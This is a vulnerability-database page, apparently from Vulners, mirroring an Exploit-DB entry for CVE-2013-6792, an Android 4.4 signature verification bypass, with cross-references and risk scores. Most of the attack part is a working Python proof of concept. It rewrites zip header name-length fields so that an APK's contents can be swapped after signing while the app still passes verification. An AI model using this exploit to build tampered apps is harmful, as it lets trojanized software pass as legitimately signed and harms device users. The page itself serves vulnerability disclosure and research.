Lucene search
+L

Google Android - Signature Verification Security Bypass

🗓️ 04 Nov 2013 00:00:00Reported by Jay FreemanType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Google Android security bypass in signature verification allowing unauthorized actions. Vulnerable version 4.4 and possibly others

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-6792
4 Nov 201300:00
circl
CVE
CVE-2013-6792
23 Jan 202014:32
cve
Cvelist
CVE-2013-6792
23 Jan 202014:32
cvelist
EUVD
EUVD-2013-6594
7 Oct 202500:30
euvd
NVD
CVE-2013-6792
23 Jan 202015:15
nvd
Prion
Security feature bypass
23 Jan 202015:15
prion
RedhatCVE
CVE-2013-6792
7 Jan 202609:51
redhatcve
source: https://www.securityfocus.com/bid/63547/info

Google Android is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.

Android 4.4 is vulnerable; other versions may also be affected.

#!/usr/bin/python

import zipfile
import struct
import sys

# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], 'r').read()

fp = zout.fp

for name in zin.namelist():
    old = zin.read(name)
    if name != replace:
        zout.writestr(name, old, zipfile.ZIP_DEFLATED)
    else:
        assert len(new) <= len(old)

        # write header, old data, and record offset
        zout.writestr(name, old, zipfile.ZIP_STORED)
        offset = fp.tell()

        # return to name length, set to skip old data
        fp.seek(-len(old) -len(name) -4, 1)
        fp.write(struct.pack('<h', len(name) + len(old)))

        # after old data, write new data \0 padded
        fp.seek(offset)
        fp.write(new)
        fp.write('\0' * (len(old) - len(new)))

zout.close()
zin.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Nov 2015 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 3.19.8
EPSS0.02991
24